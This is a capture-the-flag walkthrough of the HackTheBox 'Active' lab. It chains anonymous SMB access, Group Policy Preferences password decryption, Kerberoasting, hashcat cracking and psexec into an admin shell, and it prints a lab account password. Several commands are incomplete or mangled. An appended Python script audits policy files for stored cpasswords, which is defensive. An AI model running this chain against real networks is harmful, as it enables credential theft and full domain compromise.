HTB: Active Walkthrough


Active Directory Machine


First of all, perform an nmap scan.

nmap -T5

SMB (port 445) is open, so let's check whether we can log in anonymously.

smbclient -L \\\\\\

Works! Let's connect to the share that we saw.

smbclient \\\\\\Replication

Download all files and check them locally.

mget *

We found some information in Groups.xml. Let's try to decrypt the hash.

gpp-decrypt HASH

Looks like we found a service account. In some cases service accounts are set up as administrator accounts, which is bad practice.
Maybe we can get further with a Kerberoasting attack:

active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip -request

We get a ticket back, so let's try to crack the hash with hashcat.

hashcat -m 13100 ../hashlist.txt ~/rockyou.txt -O

Now that we have the password, we can try an attack with psexec to get an admin shell:

active.htb/administrator:[email protected]

Now we are the SYSTEM user and can access the users' desktops to get the flags.
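
As a defender-side counterpart to the Groups.xml step above, this added example (not part of the original walkthrough) audits a local copy of a policy share for XML files that still carry a non-empty cpassword attribute, without decrypting anything. The sample file, the directory names and the find_cpasswords and demo helpers are constructed for illustration.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed, simplified sample in the shape of a Group Policy Preferences
# Groups.xml; the account name and cpassword value are placeholders.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="EXAMPLE\\svc_demo">
    <Properties action="U" cpassword="PLACEHOLDER-NOT-A-REAL-VALUE" userName="EXAMPLE\\svc_demo"/>
  </User>
</Groups>
"""


def find_cpasswords(root_dir):
    """Return (path, tag, user) for each XML element with a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except (ET.ParseError, OSError):
                continue  # malformed or unreadable file: skip it, keep auditing
            for elem in tree.iter():
                # Compare attribute names case-insensitively.
                attrs = {k.lower(): v for k, v in elem.attrib.items()}
                if attrs.get("cpassword"):
                    findings.append((path, elem.tag, attrs.get("username", "")))
    return findings


def demo():
    """Build a constructed policy tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        pol = os.path.join(tmp, "Policies", "CONSTRUCTED-GUID", "MACHINE", "Preferences", "Groups")
        os.makedirs(pol)
        with open(os.path.join(pol, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        with open(os.path.join(pol, "Empty.xml"), "w", encoding="utf-8") as fh:
            fh.write('<Groups><User><Properties cpassword="" userName="x"/></User></Groups>')
        with open(os.path.join(pol, "Broken.xml"), "w", encoding="utf-8") as fh:
            fh.write("<Groups><User>")
        return [(os.path.basename(p), tag, user) for p, tag, user in find_cpasswords(tmp)]


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Any hit means the password stored there should be treated as exposed: remove the preference item and rotate that account's password.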
